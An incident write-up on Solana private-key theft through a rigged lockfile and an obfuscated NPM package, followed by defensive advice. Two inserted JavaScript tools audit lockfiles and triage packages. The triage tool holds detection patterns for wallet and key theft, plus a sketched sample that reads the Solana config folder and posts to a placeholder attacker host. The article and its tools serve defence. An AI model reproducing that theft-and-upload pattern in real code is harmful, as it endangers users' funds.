The Solana ecosystem has suffered another private-key theft, this time through malicious NPM packages disguised as open-source projects.
Analysis of Solana Users Suffering from Malicious NPM Package Theft of Private Keys
In early July 2025, a Solana user contacted the security team for help, reporting that their crypto assets had been stolen after they used an open-source project from GitHub. Investigation revealed an attack that used a malicious NPM package to steal the user's private key.
Event Process
The victim had used a GitHub project called solana-pumpfun-bot. The project looked normal and had a high number of Stars and Forks, but its commits were all clustered around three weeks earlier, with none of the steady update activity of a maintained project.
Further analysis showed that the project depends on a suspicious third-party package called crypto-layout-utils. This package has since been removed from the official NPM registry, and the pinned version has no history there at all. The attacker had edited the project's package-lock.json so that the dependency's download URL pointed to a GitHub repository under their control rather than to the registry.
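The lockfile manipulation described above is mechanical to detect: a dependency's `resolved` URL should point at the registry, and it should carry an `integrity` hash. The following is an added example (not code from the article, the security team, or any of the projects it names) that audits a package-lock.json for both conditions, handling the flat `packages` map of lockfile v2/v3 and the nested `dependencies` tree of v1. The package names crypto-layout-utils and solana-pumpfun-bot come from the article; the lockfile contents, the attacker-controlled GitHub URL and the integrity value are constructed placeholders, and the trusted-host list is an assumption you would extend for a private registry or mirror.

```javascript
// Added example, not from the article: audit a package-lock.json for dependencies
// pulled from anywhere other than the official npm registry, or pinned without an
// integrity hash. Names below come from the article; URLs/hashes are constructed.
const TRUSTED_REGISTRY_HOSTS = new Set(['registry.npmjs.org']); // assumption: adjust for private registries

// Collect [name, metadata] pairs from both lockfile layouts:
// lockfileVersion 2/3 keep a flat "packages" map keyed by install path,
// lockfileVersion 1 keeps a nested "dependencies" tree.
function collectEntries(lock) {
  const entries = [];
  for (const [installPath, meta] of Object.entries(lock.packages || {})) {
    if (installPath === '') continue; // the root project itself
    entries.push([installPath.replace(/^.*node_modules\//, ''), meta]);
  }
  const walk = (deps) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      entries.push([name, meta]);
      walk(meta.dependencies);
    }
  };
  if (!lock.packages) walk(lock.dependencies); // v2 carries both maps; avoid duplicates
  return entries;
}

function auditLockfile(lockJson, trustedHosts = TRUSTED_REGISTRY_HOSTS) {
  const lock = typeof lockJson === 'string' ? JSON.parse(lockJson) : lockJson;
  const findings = [];
  for (const [name, meta] of collectEntries(lock)) {
    if (meta.link) continue; // workspace symlink, nothing is downloaded
    // v1 lockfiles put a tarball/git URL in "version" when no registry version exists
    const source = meta.resolved ||
      (typeof meta.version === 'string' && /^(https?|git)/.test(meta.version) ? meta.version : null);
    if (!source) {
      findings.push({ name, version: meta.version, reason: 'no resolved URL' });
      continue;
    }
    let host = null;
    try { host = new URL(source).host; } catch (_) { /* unparsable source string */ }
    if (!host || !trustedHosts.has(host)) {
      findings.push({ name, version: meta.version, reason: `resolved from untrusted source ${host || source}`, source });
    }
    if (!meta.integrity) {
      findings.push({ name, version: meta.version, reason: 'missing integrity hash', source });
    }
  }
  return findings;
}

// Constructed lockfile resembling the article's scenario: one dependency from the
// registry, one redirected to an attacker-controlled GitHub tarball.
const SAMPLE_LOCKFILE = {
  name: 'solana-pumpfun-bot',
  lockfileVersion: 3,
  packages: {
    '': { name: 'solana-pumpfun-bot', dependencies: { bs58: '5.0.0', 'crypto-layout-utils': '1.3.1' } },
    'node_modules/bs58': {
      version: '5.0.0',
      resolved: 'https://registry.npmjs.org/bs58/-/bs58-5.0.0.tgz',
      integrity: 'sha512-CONSTRUCTED-PLACEHOLDER-HASH',
    },
    'node_modules/crypto-layout-utils': {
      version: '1.3.1',
      resolved: 'https://github.com/ATTACKER-ACCOUNT-PLACEHOLDER/crypto-layout-utils/archive/refs/tags/v1.3.1.tar.gz',
    },
  },
};

function auditSample() {
  return auditLockfile(SAMPLE_LOCKFILE);
}

for (const f of auditSample()) console.log(`${f.name}@${f.version}: ${f.reason}`);
```

Run against a real project with `auditLockfile(fs.readFileSync('package-lock.json', 'utf8'))`; in a CI job, a non-empty result should fail the build. A non-registry `resolved` URL is not always malicious (private forks exist), but every such entry deserves a human look before `npm install` runs it.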
Malicious Package Analysis
The security team downloaded and analyzed the suspicious crypto-layout-utils-1.3.1 package and found its code heavily obfuscated. After deobfuscation it was confirmed to be malicious: the package scans the user's computer for sensitive files and, if it finds content related to wallets or private keys, uploads it to the attacker's server.
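The three traits the analysis above attributes to the package (obfuscation, a search of the user's files for wallet or key material, and an upload to a remote server) can be triaged statically before anything is executed. The following is an added example (not code from the article or from the security team) that scans a package's JavaScript sources for indicators in each of those categories and rates the package by how the categories co-occur. The indicator patterns, the category weighting and the sample files are constructed for illustration; the second sample file is a non-functional sketch of the described behaviour, not the real package's code.

```javascript
// Added example, not from the article: first-pass static triage of a package's
// JavaScript files for obfuscation, access to wallet/key material in the home
// directory, and outbound network calls. Patterns and samples are constructed.
const INDICATORS = [
  { category: 'obfuscation', id: 'hex-identifiers', re: /\b_0x[0-9a-f]{3,}\b/i },
  { category: 'obfuscation', id: 'dynamic-eval', re: /\b(eval|Function)\s*\(/ },
  { category: 'obfuscation', id: 'string-decoding', re: /fromCharCode\s*\(|Buffer\.from\([^)]*['"](base64|hex)['"]\)/ },
  { category: 'secrets', id: 'home-dir-walk', re: /\bhomedir\s*\(|readdirSync|process\.env\.(HOME|USERPROFILE)\b/ },
  { category: 'secrets', id: 'wallet-paths', re: /\.config\/solana|id\.json|keypair|wallet|private[_ ]?key|mnemonic|seed phrase/i },
  { category: 'exfil', id: 'http-client', re: /\b(https?|axios|node-fetch)\b.*\b(request|post)\b|\bfetch\s*\(/ },
];

// Scan one file's source text; returns the ids of the indicators that matched.
function scanSource(source) {
  return INDICATORS.filter(({ re }) => re.test(source)).map(({ id }) => id);
}

// Combine the categories seen across the whole package into a verdict. Reading
// secrets and talking to the network in the same package is the pairing that matters.
function verdictFor(categories) {
  const c = new Set(categories);
  if (c.has('secrets') && c.has('exfil')) return 'high';
  if (c.size >= 2) return 'medium';
  if (c.size === 1) return 'low';
  return 'clean';
}

// files: { [relativePath]: sourceText }
function triagePackage(files) {
  const perFile = {};
  const categories = new Set();
  for (const [path, source] of Object.entries(files)) {
    const ids = scanSource(source);
    perFile[path] = ids;
    for (const ind of INDICATORS) if (ids.includes(ind.id)) categories.add(ind.category);
  }
  return { verdict: verdictFor([...categories]), categories: [...categories].sort(), perFile };
}

// Constructed sample package: one ordinary utility file and one file sketching the
// behaviour the article describes (a non-functional sketch, not the real package).
const SAMPLE_PACKAGE_FILES = {
  'lib/layout.js': 'module.exports.u64 = (buf) => buf.readBigUInt64LE(0);',
  'lib/_init.js': [
    "var _0x3a1f = require('os'), _0x5b2c = require('fs');",
    'var home = _0x3a1f.homedir();',
    "var names = _0x5b2c.readdirSync(home + '/.config/solana');",
    "require('https').request({ hostname: 'ATTACKER-HOST-PLACEHOLDER', method: 'POST' });",
  ].join('\n'),
};

function triageSample() {
  return triagePackage(SAMPLE_PACKAGE_FILES);
}

console.log(JSON.stringify(triageSample(), null, 2));
```

Feed it the extracted contents of a tarball (`npm pack <name>` then read each `.js` file) before installing. Individual patterns are noisy on their own: a legitimate Solana library will mention wallets, and plenty of honest code calls `fetch`. The signal is the co-occurrence of secrets access and network egress inside a small, obfuscated dependency, which is why the verdict is computed per package rather than per pattern.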
Attack Methods
The attackers likely controlled multiple GitHub accounts, using them both to distribute the malware and to inflate the project's Stars and Forks. Posing as a legitimate open-source project, they tricked users into downloading and running Node.js code with malicious dependencies, and stole private keys that way.
In addition, another malicious package, bs58-encrypt-utils-1.0.3, was discovered; based on it, the attack activity is believed to have begun in mid-June 2025.
Fund Flow
On-chain analysis tools showed that part of the stolen funds had been transferred to a trading platform.
Security Recommendations
Be cautious of GitHub projects with unknown sources, especially those involving wallet operations.
If an unfamiliar project must be run, run and debug it in an isolated environment.
Developers should carefully review third-party dependencies and be wary of suspicious packages and of dependencies resolved from unusual download links.
Regularly check and update project dependencies, and promptly remove components that pose security risks.
Use trusted security tools to regularly scan project code to detect potential threats early.
This incident once again shows that attackers are constantly innovating their methods to target the open-source ecosystem. Developers and users need to enhance their security awareness and work together to maintain a healthy open-source environment.